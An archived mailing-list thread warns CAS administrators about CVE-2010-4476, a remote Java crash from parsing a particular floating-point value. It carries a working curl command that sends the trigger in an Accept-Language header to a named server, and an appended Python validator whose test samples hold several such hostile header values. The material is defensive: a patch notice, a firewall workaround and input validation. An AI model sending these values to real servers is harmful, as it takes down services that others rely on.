As noted in a new thread, the CAS steering committee is responding to this serious issue with this notification post:

http://www.jasig.org/cas/news/cve-2010-4476

Best wishes,

Andrew


On 02/09/2011 09:29 AM, Marti, Robert wrote:
Correction... throwing 60 of those curls at my one server (RHEL5 64-bit, 4GB of 
RAM, no Java tuning) causes it to crawl.  It should be pretty easy to drop 
these at the load balancer/firewall though, so at least we have a workaround.

Rob Marti

-----Original Message-----
From: Marti, Robert [mailto:[email protected]]
Sent: Wednesday, February 09, 2011 8:12 AM
To: [email protected]
Subject: RE: [cas-user] Important! Critical bug in all Java versions

->  curl -vH "Accept-Language: en-us;q=2.2250738585072012e-308" http://lnxauth02d.shsu.edu:8080/sghe-cas/login
* About to connect() to lnxauth02d.shsu.edu port 8080
*   Trying 158.135.5.21... connected
* Connected to lnxauth02d.shsu.edu (158.135.5.21) port 8080
GET /sghe-cas/login HTTP/1.1
User-Agent: curl/7.15.5 (i386-redhat-linux-gnu) libcurl/7.15.5 OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.5
Host: lnxauth02d.shsu.edu:8080
Accept: */*
Accept-Language: en-us;q=2.2250738585072012e-308

It just hangs that curl until I Ctrl-C - the JVM still works fine (I can log in 
to the box without any problems) using 1.6.0_22.

Rob Marti

-----Original Message-----
From: Robert Oschwald [mailto:[email protected]]
Sent: Wednesday, February 09, 2011 7:45 AM
To: [email protected]
Cc: [email protected]
Subject: [cas-user] Important! Critical bug in all Java versions

This is off topic but important to all CAS users.

There exists a remotely exploitable critical bug in Java which can
lead to a complete crash of the JVM.
Every admin is urged to immediately patch all Sun/BEA/Oracle Java
versions on their servers.

Main cause of the problem is a flaw in the AMD/Intel floating point unit.

JVM Patcher:
https://cds.sun.com/is-bin/INTERSHOP.enfinity/WFS/CDS-CDS_Developer-Site/en_US/-/USD/ViewProductDetail-Start?ProductRef=fpupdater-oth-JPR@CDS-CDS_Developer


As noted above, every script kiddie can crash your remotely available
Java app by simply sending the magic string in an HTTP header (e.g.
by using curl).


Hope it helps.

Robert
--
You are currently subscribed to [email protected] as:
[email protected]
To unsubscribe, change settings or access archives, see
http://www.ja-sig.org/wiki/display/JSG/cas-user

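The workaround Rob Marti suggests above, dropping these requests at the load balancer or firewall, works best as an allow-list rather than a signature for the one magic string: the Accept-Language q-value grammar in RFC 2616 (section 3.9) only permits "0", "0." followed by up to three digits, or "1" with up to three trailing zeros, so anything with an exponent, a hex prefix or more digits can be rejected before it ever reaches a float parser. The following is an added example written for this page, not code from the thread or from the CAS project. The function names are hypothetical, the sample headers are constructed (one is the exact header from Rob's curl), and Python's own float parser is not affected by CVE-2010-4476; the point is the string check that stands in front of a parser that is.

```python
import re

# RFC 2616 sec. 3.9:  qvalue = ( "0" [ "." 0*3DIGIT ] ) | ( "1" [ "." 0*3("0") ] )
# Anything the pattern does not match (exponents, 2.2250738585072012e-308, hex floats,
# more than three decimals, a leading ".") is rejected before any float conversion.
QVALUE_RE = re.compile(r'^(?:0(?:\.[0-9]{0,3})?|1(?:\.0{0,3})?)$')

# RFC 2616 sec. 14.4: language-range = ( 1*8ALPHA *( "-" 1*8alphanum ) ) | "*"
LANGUAGE_RANGE_RE = re.compile(r'^(?:\*|[A-Za-z]{1,8}(?:-[A-Za-z0-9]{1,8})*)$')


class BadAcceptLanguage(ValueError):
    """Raised for any Accept-Language header outside the RFC grammar."""


def parse_accept_language(header):
    """Parse an Accept-Language value into [(language_range, q), ...].

    Every q-value is validated against QVALUE_RE as a string first, so the
    only strings ever handed to float() are of the form 0, 0.ddd or 1.000.
    Hypothetical helper written for this example.
    """
    result = []
    for element in header.split(','):
        element = element.strip()
        if not element:
            continue  # RFC 2616 tolerates empty list elements
        parts = [p.strip() for p in element.split(';')]
        language_range = parts[0]
        if not LANGUAGE_RANGE_RE.match(language_range):
            raise BadAcceptLanguage('bad language-range: %r' % language_range)
        q = 1.0  # default when no q parameter is present
        for param in parts[1:]:
            name, sep, value = param.partition('=')
            if not sep or name.strip().lower() != 'q':
                raise BadAcceptLanguage('unexpected parameter: %r' % param)
            value = value.strip()
            if not QVALUE_RE.match(value):
                # This is where en-us;q=2.2250738585072012e-308 is stopped.
                raise BadAcceptLanguage('q-value outside RFC grammar: %r' % value)
            q = float(value)
        result.append((language_range, q))
    return result


def is_safe_accept_language(header):
    """True if the header is fully within the RFC grammar, False otherwise.

    Suitable as a yes/no gate at a reverse proxy or WAF: drop (or strip the
    header from) any request for which this returns False.
    """
    try:
        parse_accept_language(header)
        return True
    except BadAcceptLanguage:
        return False


if __name__ == '__main__':
    # Constructed sample headers; the third is the one from the curl in the thread.
    samples = [
        'en-us, en;q=0.8, *;q=0.001',
        'de-DE;q=1.000, de;q=0.5',
        'en-us;q=2.2250738585072012e-308',
        'en-us;q=2.225073858507201136057409796709131975934819546351645648023426109724822222021076945516529523908135087914149158913039621106870086438694594645527657207407820621743379988141063267329253552286881372149012981122451451889849057222307285255133155755015914397476397983411801999323962548289017107081850690630666655994938275772572015763062690663332647565300009245888316433037779791869612049497390377829704905051080609940730262937128958950003583799967207254304360284078895771796150945516748243471030702609144621572289880258182545180325707018860872113128079512233426288368622321503775666622503982534335974568884423900265498198385487948292206894721689831099698365846814022854243330660339850886445804001034933970427567186443383770486037861622771738545623065874679014086723327636718749999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999e-308',
        'en;q=1.5',
        'en;q=.5',
        'en;q=0x1.0p-1022',
    ]
    for h in samples:
        print('%-8s %s' % ('PASS' if is_safe_accept_language(h) else 'DROP', h[:60]))
```

The check is deliberately a string-level allow-list: it never asks "is this the known bad constant?", so the many decimal spellings that round to the same double are all rejected together, and it can be ported verbatim to whatever language the edge device is scripted in. Note that it only covers Accept-Language; any other header or parameter the application converts to a double with the vulnerable parser needs the same treatment.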